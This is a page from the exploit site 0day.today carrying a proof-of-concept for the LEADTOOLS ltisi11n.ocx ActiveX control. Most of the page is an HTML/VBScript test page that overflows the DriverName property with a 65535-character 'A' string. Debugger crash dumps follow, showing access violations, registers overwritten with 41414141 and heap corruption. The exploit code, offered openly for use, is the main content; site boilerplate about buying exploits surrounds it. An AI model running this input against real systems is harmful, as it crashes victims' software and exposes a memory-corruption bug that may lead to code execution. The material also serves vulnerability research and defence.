0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LEADTOOLS v11.5.0.9 ltisi11n.ocx DriverName() Access Violation
============================================================== LEADTOOLS v11.5.0.9 ltisi11n.ocx DriverName() Access Violation ============================================================== <html> Test Exploit Page <object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object> <script language='vbscript'> targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx" prototype = "Property Let DriverName As String" memberName = "DriverName" progid = "LEADISISLib.LEADISIS" argCount = 1 arg1=String(65535, "A") target.DriverName = arg1 </script> Exception Code: ACCESS_VIOLATION Disasm: 7C80BEB9 MOV [EDX],AL Seh Chain: -------------------------------------------------- 1 7C839AD8 KERNEL32.dll 2 73352960 VBSCRIPT.dll 3 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- KERNEL32.7C80BEB9 ltisi11n.AA1537 ltisi11n.AA1537 OLEAUT32.77135CD9 OLEAUT32.77135CD9 OLEAUT32.771362E8 OLEAUT32.771362E8 ltisi11n.AA64D7 ltisi11n.AA64D7 ltisi11n.AA319B ltisi11n.AA319B VBSCRIPT.73303EB7 VBSCRIPT.73303EB7 VBSCRIPT.73303E27 VBSCRIPT.73303E27 VBSCRIPT.73303397 VBSCRIPT.73303397 VBSCRIPT.73303D88 VBSCRIPT.73303D88 VBSCRIPT.73311302 VBSCRIPT.73311302 VBSCRIPT.733063EE VBSCRIPT.733063EE VBSCRIPT.73306373 VBSCRIPT.73306373 VBSCRIPT.73306BA5 VBSCRIPT.73306BA5 VBSCRIPT.73306D9D VBSCRIPT.73306D9D VBSCRIPT.73305103 VBSCRIPT.73305103 SCROBJ.5CE44396 SCROBJ.5CE44396 SCROBJ.5CE4480B SCROBJ.5CE4480B SCROBJ.5CE446A6 SCROBJ.5CE446A6 SCROBJ.5CE44643 SCROBJ.5CE44643 SCROBJ.5CE44608 SCROBJ.5CE44608 1013C93 1013C93 1006B0C 1006B0C 100332C 100332C 1003105 1003105 1003076 1003076 1002F16 1002F16 KERNEL32.7C817077 Registers: -------------------------------------------------- EIP 7C80BEB9 -> AD0013ED EAX 0013BD41 -> AD0013ED EBX 00AAA760 -> 00AA408F ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EDX 02A73000 EDI 0000302A ESI 02A71F58 -> 00AAA760 EBP 0013BD6C -> 0013EDB0 ESP 0013BD48 -> 0000302A -> Uni: *0*0 Block Disassembly: -------------------------------------------------- 7C80BEA3 PUSH 7C80BED0 7C80BEA8 CALL 7C8024D6 7C80BEAD AND DWORD PTR [EBP-4],0 7C80BEB1 MOV ECX,[EBP+C] 7C80BEB4 MOV EDX,[EBP+8] 7C80BEB7 MOV AL,[ECX] 7C80BEB9 MOV [EDX],AL <--- CRASH 7C80BEBB INC ECX 7C80BEBC INC EDX 7C80BEBD TEST AL,AL 7C80BEBF JNZ SHORT 7C80BEB7 7C80BEC1 OR DWORD PTR [EBP-4],FFFFFFFF 7C80BEC5 MOV EAX,[EBP+8] 7C80BEC8 CALL 7C802511 7C80BECD RETN 8 ArgDump: -------------------------------------------------- EBP+8 02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 41414141 EBP+20 41414141 EBP+24 41414141 EBP+28 41414141 Stack Dump: -------------------------------------------------- 13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00 [....X...`...H...] 13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C [................] 13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02 [................] 13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] Exception Code: ACCESS_VIOLATION Disasm: 7C919084 MOV ECX,[EBX] Seh Chain: -------------------------------------------------- 1 7C90E920 ntdll.dll 2 7C90E920 ntdll.dll 3 7C90E920 ntdll.dll 4 7C90E920 ntdll.dll 5 73352960 VBSCRIPT.dll 6 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- ntdll.7C919084 ntdll.7C96EEA0 ntdll.7C96EEA0 ntdll.7C94B394 ntdll.7C94B394 ntdll.7C918F21 ntdll.7C918F21 ltisi11n.AA69BC ltisi11n.AA69BC ltisi11n.AA7189 ltisi11n.AA7189 ltisi11n.AA154C ltisi11n.AA154C OLEAUT32.77135CD9 OLEAUT32.77135CD9 OLEAUT32.771362E8 OLEAUT32.771362E8 ltisi11n.AA64D7 ltisi11n.AA64D7 ltisi11n.AA319B ltisi11n.AA319B VBSCRIPT.73303EB7 VBSCRIPT.73303EB7 VBSCRIPT.73303E27 VBSCRIPT.73303E27 VBSCRIPT.73303397 VBSCRIPT.73303397 VBSCRIPT.73303D88 VBSCRIPT.73303D88 VBSCRIPT.73311302 VBSCRIPT.73311302 VBSCRIPT.733063EE VBSCRIPT.733063EE VBSCRIPT.73306373 VBSCRIPT.73306373 VBSCRIPT.73306BA5 VBSCRIPT.73306BA5 VBSCRIPT.73306D9D VBSCRIPT.73306D9D VBSCRIPT.73305103 VBSCRIPT.73305103 SCROBJ.5CE44396 SCROBJ.5CE44396 SCROBJ.5CE4480B SCROBJ.5CE4480B SCROBJ.5CE446A6 SCROBJ.5CE446A6 SCROBJ.5CE44643 SCROBJ.5CE44643 SCROBJ.5CE44608 SCROBJ.5CE44608 1013C93 1013C93 1006B0C 1006B0C 100332C 100332C 1003105 1003105 1003076 1003076 1002F16 1002F16 KERNEL32.7C817077 Registers: -------------------------------------------------- EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBX 41414141 ECX 00004141 EDX 02A70168 -> 00000000 EDI 41414141 ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP 0013B824 -> 0013B8A8 ESP 0013B608 -> 0000001C Block Disassembly: -------------------------------------------------- 7C91906D MOV [EBP-25],AL 7C919070 LEA EAX,[ESI+8] 7C919073 MOV EDI,[EAX] 7C919075 MOV [EBP-1E4],EDI 7C91907B MOV EBX,[ESI+C] 7C91907E MOV [EBP-164],EBX 7C919084 MOV ECX,[EBX] <--- CRASH 7C919086 CMP ECX,[EDI+4] 7C919089 JNZ 7C92CC59 7C91908F CMP ECX,EAX 7C919091 JNZ 7C92CC59 7C919097 PUSH ESI 7C919098 PUSH DWORD PTR [EBP-1C] 7C91909B CALL 7C910684 7C9190A0 MOV [EBX],EDI ArgDump: -------------------------------------------------- EBP+8 02A70000 -> 000000C8 EBP+12 50000161 EBP+16 0000001C EBP+20 02A70000 -> 000000C8 EBP+24 00000000 EBP+28 02A70000 -> 000000C8 Stack Dump: -------------------------------------------------- 13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00 [................] 13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00 [................] 13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00 [.........`......] Exception Code: BREAKPOINT Disasm: 7C90120E INT3 Seh Chain: -------------------------------------------------- 1 7C90E920 ntdll.dll 2 7C90E920 ntdll.dll 3 7C90E920 ntdll.dll 4 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- ntdll.7C90120F ntdll.7C95F38C ntdll.7C95F38C ntdll.7C96E507 ntdll.7C96E507 ntdll.7C96F75E ntdll.7C96F75E ntdll.7C94BC4C ntdll.7C94BC4C ntdll.7C927573 ntdll.7C927573 ltisi11n.AA69F4 ltisi11n.AA69F4 VBSCRIPT.733015F2 VBSCRIPT.733015F2 VBSCRIPT.7331EEE1 VBSCRIPT.7331EEE1 VBSCRIPT.7331F192 VBSCRIPT.7331F192 VBSCRIPT.7331F632 VBSCRIPT.7331F632 VBSCRIPT.73321CB3 VBSCRIPT.73321CB3 SCROBJ.5CE448DD SCROBJ.5CE448DD SCROBJ.5CE49EEA SCROBJ.5CE49EEA SCROBJ.5CE49E41 SCROBJ.5CE49E41 1013CE7 1013CE7 1006B0C 1006B0C 100332C 100332C 1003105 1003105 1003076 1003076 1002F16 1002F16 KERNEL32.7C817077 Registers: -------------------------------------------------- EIP 7C90120F -> 000B0041 EAX 02A71EF0 -> 000B0041 EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ECX 7C91EAD5 -> FF0014C2 EDX 0013EECE -> EEF4000A EDI 000001EC ESI 02A71EF0 -> 000B0041 EBP 0013F0D4 -> 0013F0EC ESP 0013F0D0 -> 7C96E139 Block Disassembly: -------------------------------------------------- 7C9011FF TEST BYTE PTR [ESI+10],10 7C901203 JE 7C90FEF6 7C901209 POP ESI 7C90120A LEAVE 7C90120B RETN 4 7C90120E INT3 7C90120F RETN <--- CRASH 7C901210 MOV EDI,EDI 7C901212 INT3 7C901213 RETN 7C901214 MOV EDI,EDI 7C901216 MOV EAX,[ESP+4] 7C90121A INT3 7C90121B RETN 4 7C90121E MOV EAX,FS:[18] ArgDump: -------------------------------------------------- EBP+8 02A71EF0 -> 000B0041 EBP+12 02A71EF0 -> 000B0041 EBP+16 02A70000 -> 000000C8 EBP+20 02A71EF0 -> 000B0041 EBP+24 0013F100 -> 0013F174 EBP+28 7C96E507 -> 3374C084 Stack Dump: -------------------------------------------------- 13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02 [................] 13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00 [................] 13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02 [................] 13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02 [t...^...........] 13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40 [............`...] Exception Code: ACCESS_VIOLATION Disasm: 7C96E478 CMP BYTE PTR [EBX+7],FF Seh Chain: -------------------------------------------------- 1 7C90E920 ntdll.dll 2 7C90E920 ntdll.dll 3 7C839AD8 KERNEL32.dll 4 7C90E920 ntdll.dll 5 7C839AD8 KERNEL32.dll 6 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- ntdll.7C96E478 ntdll.7C96FA1D ntdll.7C96FA1D ntdll.7C94D281 ntdll.7C94D281 KERNEL32.7C834D23 KERNEL32.7C834D23 LTKRN11n.2001087F LTKRN11n.2001087F ntdll.7C913A43 ntdll.7C913A43 KERNEL32.7C80C136 KERNEL32.7C80C136 KERNEL32.7C80B72F Registers: -------------------------------------------------- EIP 7C96E478 EAX FFFFFFF8 EBX FFFFFFF8 ECX 00150000 -> 000000C8 EDX 00150608 -> 7C97E5A0 EDI 00000000 ESI 00150000 -> 000000C8 EBP 00FFFD9C -> 00FFFDEC ESP 00FFFD94 -> 00150000 Block Disassembly: -------------------------------------------------- 7C96E468 PUSH EBX 7C96E469 MOV EBX,[EBP+C] 7C96E46C TEST EBX,EBX 7C96E46E PUSH ESI 7C96E46F MOV ESI,[EBP+8] 7C96E472 JE 7C96E53E 7C96E478 CMP BYTE PTR [EBX+7],FF <--- CRASH 7C96E47C JNZ SHORT 7C96E4BC 7C96E47E CMP BYTE PTR [ESI+586],2 7C96E485 JNZ SHORT 7C96E48F 7C96E487 MOV EAX,[ESI+580] 7C96E48D JMP SHORT 7C96E491 7C96E48F XOR EAX,EAX 7C96E491 TEST EAX,EAX 7C96E493 JE 7C96E53E ArgDump: -------------------------------------------------- EBP+8 00150000 -> 000000C8 EBP+12 FFFFFFF8 EBP+16 7C96FADC -> Asc: RtlGetUserInfoHeap EBP+20 00000000 EBP+24 00000000 EBP+28 00000003 Stack Dump: -------------------------------------------------- FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C [................] FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00 [................] FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E [........l.....D.] FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00 [........[.......] FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C [................] ApiLog -------------------------------------------------- ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) Debug String Log -------------------------------------------------- HEAP[wscript.exe]: Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec # 0day.today [2024-12-24] #